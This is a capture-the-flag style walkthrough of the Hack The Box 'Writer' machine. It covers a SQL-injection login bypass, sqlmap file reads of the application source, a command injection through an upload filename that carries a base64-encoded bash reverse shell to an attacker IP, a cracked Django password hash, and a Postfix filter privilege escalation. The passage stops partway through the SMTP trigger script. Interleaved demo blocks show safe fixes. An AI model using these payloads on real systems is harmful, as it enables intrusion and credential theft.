Writer Hack The Box Write-up | Writer Hack The Box Walkthrough

FreakyDodo
14 min read · Dec 16, 2021


Hey Hackers!!!

In this blog we cover Writer, a medium-difficulty Linux machine on Hack The Box. It mirrors a lot of real-world bug hunting and foothold work: enumeration, SQL injection (and using sqlmap's file-read to pull application source off the box), command injection in an image upload handler, cracking a Django password hash with hashcat, and two Linux privilege-escalation steps that both come down to a group-owned file that a privileged service executes.

So, let's begin with initial reconnaissance.

Recon

# Nmap 7.80 scan initiated Sat Aug  7 14:38:25 2021 as: nmap -sS -sV -sC -oN nmap 10.10.11.101
Nmap scan report for writer.htb (10.10.11.101)
Host is up (0.33s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 57s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-08-07T06:39:40
|_  start_date: N/A

# Nmap 7.80 scan initiated Sat Aug 7 14:41:42 2021 as: nmap -sU -sV -sC -p 137 -oN nmap_udp 10.10.11.101
Nmap scan report for writer.htb (10.10.11.101)
Host is up (0.39s latency).

PORT    STATE SERVICE    VERSION
137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
Service Info: Host: WRITER

Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 7 14:41:44 2021 -- 1 IP address (1 host up) scanned in 2.16 seconds

BASH

SSH, Apache and Samba are exposed. The HTTP title gives away the hostname writer.htb, so add it to /etc/hosts before going further:

/etc/hosts
10.10.11.101 writer.htb

Directory fuzzing on the web root:

wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ --hc 404 -t 200

Among the hits is /administrative, a login form.

Got Web Shell

The login form is injectable through the username field. The classic `admin' or '1'='1` in uname gets past it; the session cookie captured later in this post decodes to `{"user":"admin' -- -"}`, so the comment-style variant works just as well. Only the username is injectable: as the application source shows further down, the password is MD5-hashed before it reaches the query, so it can never contain anything but hex digits. The raw login request, saved to res.txt for sqlmap:

POST /administrative HTTP/1.1
Host: writer.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://writer.htb
Connection: close
Referer: http://writer.htb/administrative
Upgrade-Insecure-Requests: 1

uname=demo&password=demo

HTTP
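The bypass above, reproduced as an added example (this is not code from the write-up or from the Writer application): the query is the one built in login_page() of the application source dumped later in this post, copied here verbatim, with its parameterised counterpart beside it. An in-memory SQLite table stands in for the box's MySQL database; the users table, the admin row and its password are constructed for the demo.

```python
# Added example (not code from the write-up): the login query from login_page()
# in writer's __init__.py, run against an in-memory SQLite table so the bypass
# can be exercised offline. SQLite stands in for the box's MySQL; the schema,
# the 'admin' row and its password are constructed for this demo.
import hashlib
import sqlite3


def setup_db():
    """Constructed users table: one admin row whose password we do not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (1, 'admin', ?)",
        (hashlib.md5(b"constructed-demo-password").hexdigest(),),
    )
    return conn


def login_vulnerable(conn, username, password):
    """Mirror of the app: MD5 the password, then %-format both into the SQL string.

    The hash step means the password half of the WHERE clause can only ever be
    hex digits, so the username is the only injection point (which is exactly
    what the write-up's payloads use).
    """
    pw_hash = hashlib.md5(password.encode("utf-8")).hexdigest()
    sql = "Select * From users Where username = '%s' And password = '%s'" % (username, pw_hash)
    return conn.execute(sql).fetchall()


def login_fixed(conn, username, password):
    """Hardened form: identical logic, but values are bound parameters.

    MD5 is kept only to isolate the injection fix; a real fix would also move
    to a slow salted hash.
    """
    pw_hash = hashlib.md5(password.encode("utf-8")).hexdigest()
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, pw_hash)).fetchall()


def bypass_results():
    """Run both write-up payloads through both versions of the login."""
    conn = setup_db()
    out = {}
    for payload in ("admin' or '1'='1", "admin' -- -"):
        out[payload] = {
            "vulnerable": len(login_vulnerable(conn, payload, "anything")) > 0,
            "fixed": len(login_fixed(conn, payload, "anything")) > 0,
        }
    # The real credential still works through the fixed path.
    out["legit"] = len(login_fixed(conn, "admin", "constructed-demo-password")) > 0
    return out


if __name__ == "__main__":
    for k, v in bypass_results().items():
        print(k, v)
```

Both payloads return the admin row from the vulnerable query (for the OR form, `username = 'admin'` is true on its own, so the `AND password = ...` that binds to the `'1'='1'` side never matters) and nothing from the parameterised one.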

sqlmap confirms the injection in uname. Because the application's MySQL account holds the FILE privilege, --file-read can pull arbitrary files off disk through LOAD_FILE(). Start with the Apache vhost config to find out where the application lives:

sqlmap -r res.txt --file-read=/etc/apache2/sites-enabled/000-default.conf

/etc/apache2/sites-enabled/000-default.conf

# Virtual host configuration for writer.htb domain
<VirtualHost *:80>
    ServerName writer.htb
    ServerAdmin admin@writer.htb
    WSGIScriptAlias / /var/www/writer.htb/writer.wsgi
    <Directory /var/www/writer.htb>
        Order allow,deny
        Allow from all
    </Directory>
    Alias /static /var/www/writer.htb/writer/static
    <Directory /var/www/writer.htb/writer/static/>
        Order allow,deny
        Allow from all
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    LogLevel warn
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

# Virtual host configuration for dev.writer.htb subdomain
# Will enable configuration after completing backend development
# Listen 8080
#<VirtualHost 127.0.0.1:8080>
#    ServerName dev.writer.htb
#    ServerAdmin admin@writer.htb
#
#    # Collect static for the writer2_project/writer_web/templates
#    Alias /static /var/www/writer2_project/static
#    <Directory /var/www/writer2_project/static>
#        Require all granted
#    </Directory>
#
#    <Directory /var/www/writer2_project/writerv2>
#        <Files wsgi.py>
#            Require all granted
#        </Files>
#    </Directory>
#
#    WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env
#    WSGIProcessGroup writer2_project
#    WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py
#    ErrorLog ${APACHE_LOG_DIR}/error.log
#    LogLevel warn
#    CustomLog ${APACHE_LOG_DIR}/access.log combined
#
#</VirtualHost>

The live vhost serves a Flask application out of /var/www/writer.htb through WSGI. The commented-out dev.writer.htb vhost points at a second project, /var/www/writer2_project, which becomes relevant once we have a shell. Reading the Flask application itself with the same --file-read gives hard-coded database credentials and the upload handling:

/var/www/writer.htb/writer/__init__.py

from flask import Flask, session, redirect, url_for, request, render_template
from mysql.connector import errorcode
import mysql.connector
import urllib.request
import os
import PIL
from PIL import Image, UnidentifiedImageError
import hashlib

app = Flask(__name__,static_url_path='',static_folder='static',template_folder='templates')

#Define connection for database
def connections():
    try:
        connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')
        return connector
    except mysql.connector.Error as err:
        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
            return ("Something is wrong with your db user name or password!")
        elif err.errno == errorcode.ER_BAD_DB_ERROR:
            return ("Database does not exist")
        else:
            return ("Another exception, returning!")
    else:
        print ('Connection to DB is ready!')

#Define homepage
@app.route('/')
def home_page():
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    cursor = connector.cursor()
    sql_command = "SELECT * FROM stories;"
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template('blog/blog.html', results=results)

#Define about page
@app.route('/about')
def about():
    return render_template('blog/about.html')

#Define contact page
@app.route('/contact')
def contact():
    return render_template('blog/contact.html')

#Define blog posts
@app.route('/blog/post/<id>', methods=['GET'])
def blog_post(id):
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    cursor = connector.cursor()
    cursor.execute("SELECT * FROM stories WHERE id = %(id)s;", {'id': id})
    results = cursor.fetchall()
    sql_command = "SELECT * FROM stories;"
    cursor.execute(sql_command)
    stories = cursor.fetchall()
    return render_template('blog/blog-single.html', results=results, stories=stories)

#Define dashboard for authenticated users
@app.route('/dashboard')
def dashboard():
    if not ('user' in session):
        return redirect('/')
    return render_template('dashboard.html')

#Define stories page for dashboard and edit/delete pages
@app.route('/dashboard/stories')
def stories():
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    cursor = connector.cursor()
    sql_command = "Select * From stories;"
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template('stories.html', results=results)

@app.route('/dashboard/stories/add', methods=['GET', 'POST'])
def add_story():
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    if request.method == "POST":
        if request.files['image']:
            image = request.files['image']
            # substring check only; the raw client-supplied filename is used as-is on disk
            if ".jpg" in image.filename:
                path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
                image.save(path)
                image = "/img/{}".format(image.filename)
            else:
                error = "File extensions must be in .jpg!"
                return render_template('add.html', error=error)

        if request.form.get('image_url'):
            image_url = request.form.get('image_url')
            if ".jpg" in image_url:
                try:
                    # file:// URLs make urlretrieve() return the given path itself
                    local_filename, headers = urllib.request.urlretrieve(image_url)
                    # unquoted path inside a shell command: command injection
                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
                    image = "{}.jpg".format(local_filename)
                    try:
                        im = Image.open(image)
                        im.verify()
                        im.close()
                        image = image.replace('/tmp/','')
                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
                        image = "/img/{}".format(image)
                    except PIL.UnidentifiedImageError:
                        os.system("rm {}".format(image))
                        error = "Not a valid image file!"
                        return render_template('add.html', error=error)
                except:
                    error = "Issue uploading picture"
                    return render_template('add.html', error=error)
            else:
                error = "File extensions must be in .jpg!"
                return render_template('add.html', error=error)
        author = request.form.get('author')
        title = request.form.get('title')
        tagline = request.form.get('tagline')
        content = request.form.get('content')
        cursor = connector.cursor()
        cursor.execute("INSERT INTO stories VALUES (NULL,%(author)s,%(title)s,%(tagline)s,%(content)s,'Published',now(),%(image)s);", {'author':author,'title': title,'tagline': tagline,'content': content, 'image':image })
        result = connector.commit()
        return redirect('/dashboard/stories')
    else:
        return render_template('add.html')

@app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST'])
def edit_story(id):
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    if request.method == "POST":
        cursor = connector.cursor()
        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
        results = cursor.fetchall()
        if request.files['image']:
            image = request.files['image']
            if ".jpg" in image.filename:
                path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
                image.save(path)
                image = "/img/{}".format(image.filename)
                cursor = connector.cursor()
                cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
                result = connector.commit()
            else:
                error = "File extensions must be in .jpg!"
                return render_template('edit.html', error=error, results=results, id=id)
        if request.form.get('image_url'):
            image_url = request.form.get('image_url')
            if ".jpg" in image_url:
                try:
                    local_filename, headers = urllib.request.urlretrieve(image_url)
                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
                    image = "{}.jpg".format(local_filename)
                    try:
                        im = Image.open(image)
                        im.verify()
                        im.close()
                        image = image.replace('/tmp/','')
                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
                        image = "/img/{}".format(image)
                        cursor = connector.cursor()
                        cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
                        result = connector.commit()

                    except PIL.UnidentifiedImageError:
                        os.system("rm {}".format(image))
                        error = "Not a valid image file!"
                        return render_template('edit.html', error=error, results=results, id=id)
                except:
                    error = "Issue uploading picture"
                    return render_template('edit.html', error=error, results=results, id=id)
            else:
                error = "File extensions must be in .jpg!"
                return render_template('edit.html', error=error, results=results, id=id)
        title = request.form.get('title')
        tagline = request.form.get('tagline')
        content = request.form.get('content')
        cursor = connector.cursor()
        cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id})
        result = connector.commit()
        return redirect('/dashboard/stories')

    else:
        cursor = connector.cursor()
        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
        results = cursor.fetchall()
        return render_template('edit.html', results=results, id=id)

@app.route('/dashboard/stories/delete/<id>', methods=['GET', 'POST'])
def delete_story(id):
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    if request.method == "POST":
        cursor = connector.cursor()
        cursor.execute("DELETE FROM stories WHERE id = %(id)s;", {'id': id})
        result = connector.commit()
        return redirect('/dashboard/stories')
    else:
        cursor = connector.cursor()
        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
        results = cursor.fetchall()
        return render_template('delete.html', results=results, id=id)

#Define user page for dashboard
@app.route('/dashboard/users')
def users():
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return "Database Error"
    cursor = connector.cursor()
    sql_command = "SELECT * FROM users;"
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template('users.html', results=results)

#Define settings page
@app.route('/dashboard/settings', methods=['GET'])
def settings():
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return "Database Error!"
    cursor = connector.cursor()
    sql_command = "SELECT * FROM site WHERE id = 1"
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template('settings.html', results=results)

#Define authentication mechanism
@app.route('/administrative', methods=['POST', 'GET'])
def login_page():
    if ('user' in session):
        return redirect('/dashboard')
    if request.method == "POST":
        username = request.form.get('uname')
        password = request.form.get('password')
        password = hashlib.md5(password.encode('utf-8')).hexdigest()
        try:
            connector = connections()
        except mysql.connector.Error as err:
            return ("Database error")
        try:
            cursor = connector.cursor()
            # username is string-formatted straight into the query: SQL injection
            sql_command = "Select * From users Where username = '%s' And password = '%s'" % (username, password)
            cursor.execute(sql_command)
            results = cursor.fetchall()
            for result in results:
                print("Got result")
            if result and len(result) != 0:
                session['user'] = username
                return render_template('success.html', results=results)
            else:
                error = "Incorrect credentials supplied"
                return render_template('login.html', error=error)
        except:
            error = "Incorrect credentials supplied"
            return render_template('login.html', error=error)
    else:
        return render_template('login.html')

@app.route("/logout")
def logout():
    if not ('user' in session):
        return redirect('/')
    session.pop('user')
    return redirect('/')

if __name__ == '__main__':
    app.run("0.0.0.0")

PYTHON

The part that matters is the image_url branch of add_story() (edit_story() carries the same code):

if request.form.get('image_url'):
    image_url = request.form.get('image_url')
    if ".jpg" in image_url:
        try:
            local_filename, headers = urllib.request.urlretrieve(image_url)
            os.system("mv {} {}.jpg".format(local_filename, local_filename))
            image = "{}.jpg".format(local_filename)
            try:
                im = Image.open(image)
                im.verify()
                im.close()
                image = image.replace('/tmp/','')
                os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
                image = "/img/{}".format(image)
            except PIL.UnidentifiedImageError:
                os.system("rm {}".format(image))
                error = "Not a valid image file!"
                return render_template('add.html', error=error)
        except:
            error = "Issue uploading picture"
            return render_template('add.html', error=error)
    else:
        error = "File extensions must be in .jpg!"
        return render_template('add.html', error=error)

PYTHON

Two things are wrong here. The extension check is a substring test (`".jpg" in image_url`), and the filename that comes back from urlretrieve() is dropped, unquoted, into a shell command string that os.system() hands to /bin/sh. urllib.request.urlretrieve() accepts file:// URLs, and for those it does not copy anything to /tmp: it returns the local path itself, as long as the file exists. So a path containing shell metacharacters goes straight into `mv {} {}.jpg`. The plain-upload branch is what lets us create such a file: `image.filename` only has to contain .jpg and is joined directly onto the static/img directory, so a file whose name carries a backtick command substitution lands on disk. Step one, the upload, creates it:

POST /dashboard/stories/add HTTP/1.1
Host: writer.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4229921975180160461559477084
Content-Length: 905
Origin: http://writer.htb
Connection: close
Referer: http://writer.htb/dashboard/stories/add
Cookie: session=eyJ1c2VyIjoiYWRtaW4nIC0tIC0ifQ.YRZmJQ.N6M7slyxhOtSWldWbognlVjbwdo
Upgrade-Insecure-Requests: 1

-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="author"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="title"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="tagline"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="image"; filename="123.jpg;`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash`"
Content-Type: image/jpeg


-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="image_url"


-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="content"

asdasdasdasd
-----------------------------4229921975180160461559477084--

HTTP

Step two points image_url at the file just written, using a file:// URL. urlretrieve() returns that path, os.system() passes it to the shell, and the backticks are expanded (and therefore executed) before mv ever runs. The base64 decodes to `/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.24/10086 0>&1"`, so a listener on port 10086 receives a shell as www-data:

POST /dashboard/stories/add HTTP/1.1
Host: writer.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4229921975180160461559477084
Content-Length: 959
Origin: http://writer.htb
Connection: close
Referer: http://writer.htb/dashboard/stories/add
Cookie: session=eyJ1c2VyIjoiYWRtaW4nIC0tIC0ifQ.YRZmJQ.N6M7slyxhOtSWldWbognlVjbwdo
Upgrade-Insecure-Requests: 1

-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="author"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="title"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="tagline"

hack
-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="image"; filename="123.jpg"
Content-Type: image/jpeg


-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="image_url"

file:///var/www/writer.htb/writer/static/img/123.jpg;`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash`

-----------------------------4229921975180160461559477084
Content-Disposition: form-data; name="content"

asdasdasdasd
-----------------------------4229921975180160461559477084--

HTTP
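The two requests above, boiled down to the one line that matters, as an added example (not code from the write-up or from the Writer application): the app's pattern of a substring ".jpg" check followed by a str.format()-built `mv` through the shell, next to a version that allow-lists the name and renames without any shell. The payload filename has the same shape as the write-up's but carries a harmless `touch marker` instead of the reverse shell, and everything happens inside a temporary directory; the names and the directory are constructed for the demo.

```python
# Added example (not code from the write-up): why the write-up's filename
# payload works against add_story(), and what a safe rename looks like.
# The payload below has the same shape as the real one but runs a harmless
# `touch marker`; all file names are constructed and live in a temp dir.
import os
import re
import secrets
import subprocess
import tempfile

# Same shape as the write-up's filename; `touch marker` stands in for the bash one-liner.
PAYLOAD_NAME = "123.jpg;`touch marker`"
# Hardened allow-list: a short basename made of safe characters, ending in .jpg.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.jpg$")


def app_style_move(workdir, local_filename):
    """The application's pattern: substring extension check, then a shell string.

    Mirrors os.system("mv {} {}.jpg".format(...)) but contained in workdir.
    Returns True if the injected command ran (the marker file appeared).
    """
    if ".jpg" not in local_filename:       # substring test, not an extension check
        return False
    cmd = "mv {} {}.jpg".format(local_filename, local_filename)   # unquoted, via /bin/sh
    subprocess.run(cmd, shell=True, cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return os.path.exists(os.path.join(workdir, "marker"))


def hardened_move(workdir, local_filename):
    """Allow-list the basename, then rename with os.replace (no shell at all).

    The stored name is generated server-side, so nothing the client chose ever
    reaches a path or a command. Returns the stored name, or None if rejected.
    """
    name = os.path.basename(local_filename)
    if not SAFE_NAME_RE.fullmatch(name):
        return None
    stored = secrets.token_hex(8) + ".jpg"
    os.replace(os.path.join(workdir, name), os.path.join(workdir, stored))
    return stored


def demo():
    """Feed the payload name to both handlers and report what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, PAYLOAD_NAME), "wb").close()   # the 'uploaded' file
        results["vulnerable_ran_payload"] = app_style_move(d, PAYLOAD_NAME)
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, PAYLOAD_NAME), "wb").close()
        results["hardened_accepted_payload"] = hardened_move(d, PAYLOAD_NAME) is not None
        results["hardened_ran_payload"] = os.path.exists(os.path.join(d, "marker"))
        open(os.path.join(d, "123.jpg"), "wb").close()
        stored = hardened_move(d, "123.jpg")
        results["hardened_accepted_clean"] = stored is not None and os.path.exists(os.path.join(d, stored))
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

In the vulnerable path the shell sees `mv 123.jpg;` (which fails harmlessly) and then expands the two backtick groups, so `touch marker` runs twice before mv could have done anything. Flask applications usually reach for werkzeug.utils.secure_filename() for the first half of the fix; the second half is never building a command line out of user data, and with os.replace() there is no command line at all.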

There are two users on the box, john and kyle, and user.txt belongs to kyle. The second project from the Apache config, /var/www/writer2_project, is a Django application that www-data and the smbgroup group can read:

www-data@writer:/$ ls /home
john
kyle
www-data@writer:/$ ls -al /home/kyle
total 28
drwxr-xr-x 3 kyle kyle 4096 Aug 5 09:59 .
drwxr-xr-x 4 root root 4096 Jul 9 10:59 ..
lrwxrwxrwx 1 root root 9 May 18 18:03 .bash_history -> /dev/null
-rw-r--r-- 1 kyle kyle 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 kyle kyle 3771 Feb 25 2020 .bashrc
drwx------ 2 kyle kyle 4096 Jul 28 09:03 .cache
-rw-r--r-- 1 kyle kyle 807 Feb 25 2020 .profile
-r-------- 1 kyle kyle 33 Aug 14 08:32 user.txt
www-data@writer:/var/www/writer2_project/writerv2$ ls -al
total 24
dr-xr-sr-x 3 www-data smbgroup 4096 May 19 12:32 .
drwxrws--- 6 www-data smbgroup 4096 Aug 2 06:52 ..
-r-xr-s--- 1 www-data smbgroup 0 Aug 14 08:56 __init__.py
dr-xr-s--- 2 www-data smbgroup 4096 May 19 21:06 __pycache__
-r-xr-s--- 1 www-data smbgroup 3307 Aug 14 08:56 settings.py
-r-xr-s--- 1 www-data smbgroup 817 Aug 14 08:56 urls.py
-r-xr-s--- 1 www-data smbgroup 401 Aug 14 08:56 wsgi.py

BASH

settings.py does not embed the database credentials; it defers to the MySQL client configuration file:

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'OPTIONS': {
            'read_default_file': '/etc/mysql/my.cnf',
        },
    }
}

/etc/mysql/my.cnf is readable and holds them:

[client]
database = dev
user = djangouser
password = DjangoSuperPassword
default-character-set = utf8

Connecting to the dev database with those credentials exposes Django's auth_user table:

MariaDB [dev]> select username,password from auth_user;
+----------+------------------------------------------------------------------------------------------+
| username | password                                                                                 |
+----------+------------------------------------------------------------------------------------------+
| kyle     | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= |
+----------+------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

That is Django's PBKDF2-SHA256 format, hashcat mode 10000. At 260000 iterations per candidate it is slow, but rockyou gets there:

PS E:\tools\hashcat-5.1.0> hashcat64.exe .\hash.txt .\rockyou.txt -m 10000 --show
pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=:marcoantonio

BASH
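What hashcat -m 10000 is actually computing, as an added example that is not part of the original post: parse Django's `pbkdf2_sha256$<iterations>$<salt>$<base64 digest>` string, re-derive the digest with PBKDF2-HMAC-SHA256 using the salt's ASCII bytes (which is what Django's hasher does), and compare. DJANGO_HASH is the auth_user row above; the candidate wordlist standing in for rockyou is constructed here, and the 1000-iteration hash used to exercise the code is one the block generates itself.

```python
# Added example (not code from the write-up): a from-scratch check of Django's
# pbkdf2_sha256 hashes, i.e. what hashcat mode 10000 does. DJANGO_HASH is the
# auth_user row from the write-up; the wordlist is constructed.
import base64
import hashlib
import hmac

DJANGO_HASH = "pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A="


def parse_django_hash(encoded):
    """Split 'algorithm$iterations$salt$b64digest' into its parts."""
    algorithm, iterations, salt, digest_b64 = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError("unsupported algorithm: " + algorithm)
    return int(iterations), salt, base64.b64decode(digest_b64)


def django_encode(password, salt, iterations):
    """Same derivation as Django's PBKDF2PasswordHasher: the salt string's bytes
    are the PBKDF2 salt and the 32-byte digest is base64-encoded."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt.encode("utf-8"), iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt, base64.b64encode(dk).decode("ascii"))


def check_password(password, encoded):
    """Constant-time comparison of a candidate against the stored hash."""
    iterations, salt, digest = parse_django_hash(encoded)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt.encode("utf-8"), iterations)
    return hmac.compare_digest(candidate, digest)


def crack(encoded, wordlist):
    """Dictionary attack: first word that verifies, or None. The cost per word is
    the full iteration count, which is exactly why the count is set high."""
    for word in wordlist:
        if check_password(word, encoded):
            return word
    return None


if __name__ == "__main__":
    # Constructed stand-in for rockyou; the write-up's hashcat run recovered "marcoantonio".
    candidates = ["password", "kyle123", "marcoantonio"]
    print(crack(DJANGO_HASH, candidates))
```

Each check costs 260000 HMAC-SHA256 rounds, so in pure Python this is only practical for a handful of candidates; hashcat exists for the rockyou-sized case, but the logic is identical.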

The password is reused for kyle's system account, which gives user.txt:

kyle@writer:~$ ls -al
total 28
drwxr-xr-x 3 kyle kyle 4096 Aug 5 09:59 .
drwxr-xr-x 4 root root 4096 Jul 9 10:59 ..
lrwxrwxrwx 1 root root 9 May 18 18:03 .bash_history -> /dev/null
-rw-r--r-- 1 kyle kyle 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 kyle kyle 3771 Feb 25 2020 .bashrc
drwx------ 2 kyle kyle 4096 Jul 28 09:03 .cache
-rw-r--r-- 1 kyle kyle 807 Feb 25 2020 .profile
-r-------- 1 kyle kyle 33 Aug 13 12:20 user.txt
kyle@writer:~$ cat user.txt
a90cca8b34ddad84ad5f93fae43fe8d1

BASH

Privilege escalation

kyle is in the filter group, and the only file that group owns is /etc/postfix/disclaimer, a Postfix content-filter script that runs for mail passing through the server:

kyle@writer:/var/www/writer2_project$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)
kyle@writer:~$ find / -group filter -type f 2>/dev/null
/etc/postfix/disclaimer

Whatever the filter group puts into that script runs the next time a message is filtered, and, as the shell further down shows, not as kyle. Triggering it means sending mail. Postfix only listens on localhost (port 25 was not in the nmap scan), so forward it out with NATBypass, run on the target:

BASH

./NATBypass -tran 2255 127.0.0.1:25

Then a small SMTP client mails john through the forwarded port. Delivery makes Postfix run the content filter, and with it whatever the disclaimer script now contains; the message body itself is irrelevant:

sendmail.py

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "10.10.14.24"
lport = 10086
rhost = "10.10.11.101"
rport = 2255 # forwarded to 127.0.0.1:25 on the box (489,587 would be the usual submission ports)

# create message object instance
msg = MIMEMultipart()


# setup the parameters of the message
password = ""
msg['From'] = "kyle@write.htb"
msg['To'] = "john@write.htb"
msg['Subject'] = "This is not a drill!"

# payload (the body does not matter; the filter script does the work)
message = ('asdasdasd')

print("[*] Payload is generated : %s" % message)

msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost, port=rport)

if server.noop()[0] != 250:
    print("[-]Connection Error")
